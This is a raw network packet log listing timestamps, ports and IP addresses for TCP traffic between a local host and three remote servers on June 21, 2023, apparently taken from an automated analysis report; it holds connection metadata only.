Jun 21, 2023 04:27:44.008043051 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.008069992 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.009325981 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.009444952 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.009475946 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.009933949 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.010162115 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.010231972 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.010262012 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.010318995 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.135196924 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135442019 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.135488987 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135524988 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135546923 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135641098 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135659933 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.135694981 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135731936 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.135873079 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.135968924 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.136117935 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.136157990 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.136187077 CEST	49707	443	192.168.2.3	103.233.24.19
Jun 21, 2023 04:27:44.136210918 CEST	443	49707	103.233.24.19	192.168.2.3
Jun 21, 2023 04:27:44.335093975 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.352303028 CEST	80	49705	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.354454994 CEST	49705	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.369409084 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.369510889 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.369705915 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.396739006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.413783073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.413914919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.414207935 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.414251089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.432979107 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.433027983 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.434922934 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.434946060 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.514777899 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.514893055 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.537213087 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.537225008 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.537266016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.537270069 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.537334919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.537998915 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.538830042 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.557439089 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.599328041 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.599689960 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.599925041 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.611301899 CEST	49708	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:44.611344099 CEST	443	49708	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:44.614504099 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.614568949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.631381989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.631473064 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690357924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690417051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690463066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690507889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690551996 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690567017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.690597057 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690629005 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.690649033 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.690660954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690710068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690756083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.690761089 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.691076040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.691123962 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.691143036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.691169977 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.691216946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.731118917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731172085 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731220961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731256962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.731267929 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731309891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.731317043 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731369019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.731412888 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.731865883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732004881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732052088 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732098103 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732112885 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.732146025 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732160091 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.732829094 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732877016 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732897043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.732922077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732969999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.732985973 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.733638048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.733689070 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.733714104 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.733736038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.733784914 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.733829975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.734410048 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.734456062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.734513044 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.734522104 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.734570980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.734628916 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.735177994 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.735627890 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.772990942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773057938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773098946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773144960 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773145914 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.773180008 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773205042 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773309946 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.773555040 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773606062 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773652077 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773684025 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.773699999 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.773797035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.774319887 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.774372101 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.774418116 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.774470091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.774480104 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.775129080 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.775144100 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.775177002 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.775224924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.775235891 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.775274038 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.775351048 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.775918007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.775966883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776014090 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776048899 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.776062965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776160955 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.776726961 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776793957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776840925 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776889086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.776916027 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.776948929 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.777539968 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.777589083 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.777636051 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.777661085 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.777683973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.777734041 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.778284073 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.778351068 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.778414011 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.778434038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.778460979 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.778532028 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.779115915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779166937 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779212952 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779259920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779272079 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.779901981 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779953003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.779984951 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.779999971 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780006886 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.780049086 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780119896 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.780688047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780736923 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780783892 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780818939 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.780831099 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.780891895 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.781474113 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.814996004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815059900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815105915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815150976 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815150023 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.815191031 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.815195084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815244913 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815251112 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.815285921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815340996 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.815484047 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815535069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815582037 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815618038 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.815623045 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.815697908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.816154003 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.816203117 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.816246986 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.816315889 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.816324949 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.816364050 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.816431046 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.816996098 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817043066 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817096949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817101002 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.817146063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817150116 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.817194939 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817409039 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.817936897 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.817986965 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818033934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818079948 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818097115 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.818126917 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818134069 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.818882942 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818929911 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.818974972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.819073915 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.821310997 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821362972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821410894 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821455956 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821482897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.821502924 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821505070 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.821757078 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821805000 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821850061 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821882963 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.821897030 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.821912050 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.821945906 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.822017908 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.822770119 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.822818995 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.822868109 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.822906017 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.822912931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.822958946 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823024035 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.823685884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823740959 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823786974 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823822975 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.823832989 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823870897 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.823879957 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.823951006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.832288980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832362890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832412004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832448006 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.832458973 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832509041 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832556009 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832571983 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.832603931 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832650900 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832665920 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.832700014 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832748890 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.832756042 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.832808971 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.833570004 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.833616972 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.833663940 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.833690882 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.833713055 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.833760023 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.833823919 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.834518909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.834568024 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.834611893 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.834631920 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.834656954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.834671021 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.834703922 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.834753036 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.835464954 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.835517883 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.835586071 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.835591078 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.835633993 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.835681915 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.835699081 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.836432934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.836484909 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.836515903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.836529970 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.836579084 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.836637020 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.836637974 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.838363886 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838418007 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838454962 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.838480949 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838481903 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.838562012 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838609934 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838629007 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.838809967 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838879108 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838879108 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.838928938 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838974953 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.838992119 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.839021921 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.839799881 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.839850903 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.839884043 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.839899063 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.839910030 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.839965105 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.840015888 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.856787920 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.856854916 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.856901884 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.856949091 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.856997013 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857001066 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857069969 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857073069 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857132912 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857153893 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:44.857182980 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:44.857235909 CEST	80	49709	188.114.96.7	192.168.2.3
